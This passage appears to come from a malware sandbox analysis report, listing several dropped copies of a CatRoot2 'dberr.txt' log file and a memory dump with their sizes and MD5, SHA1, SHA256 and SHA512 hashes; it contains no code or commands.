9c32c9dcac5f23de8531264761e0544bec426dbc

SHA256
78fc46f8d52759eea17946853da4564e13ee087aa0d7a66d140c79daa6d2f530

SHA512
b4c50a1a6f5a9611219bee33b8f581d142adc2a3efbff54becb40ccd44524b9c653399d63a3f432b4c3f9fde7ac70cd304138842bbba2be30311d17a5884f4bb

Download Submit
C:\Windows\System32\CatRoot2\dberr.txt

Filesize
23KB

MD5
fc3f7844488801f0af2ff9256cb22075

SHA1
5d69dffc93dc6a306a17c55247245a3175894eaf

SHA256
7e9d5508e0eb6bf3495464978e7d9b234c8b3cc8b28028b553e5563ee9eb27a7

SHA512
0aa3e8c26f507ba15e084ca817e77705c1ea266573d195cc9b86db60820db88fe9fdb666679d2ed64da10029aa062c580d40de531c4f0214c3f72d0931814950

Download Submit
C:\Windows\System32\CatRoot2\dberr.txt

Filesize
23KB

MD5
83f6b4597c63b3a3ca945305f83d08b8

SHA1
af0aeea164d39fc4992edcacf2901a5f54689c1f

SHA256
c05b2c2021af93baeb93f9c697859b642c241b2a01f0155ce976e0f4c346ed2f

SHA512
c2c40addb73d8631c110a5ed881fa50788cb5944675d9f1b7483c1c571b385769597d715f6bf214e7038bac4b30e95dcb0f04b94f2ff3c412cd687097f813108

Download Submit
C:\Windows\System32\catroot2\dberr.txt

Filesize
22KB

MD5
cc7c9557fb63f260699b5c273bc7843b

SHA1
9d68a500838c04996cd18691d357abca126fd888

SHA256
b3b56cea7cc9959dfb582a64a00a7148c290044f1e2859037c966744450d7d42

SHA512
428bd00bf52768c261f130ccd56c9a3f1a525ef6f742d982eecc8d7fa055a65bb8cf47fb2ab9ddd7a078497a43d77984225683b62faac0524664ecb9bdf83b4b

Download Submit
memory/4976-2-0x0000020467BF0000-0x0000020467C12000-memory.dmp

Filesize
136KB

Download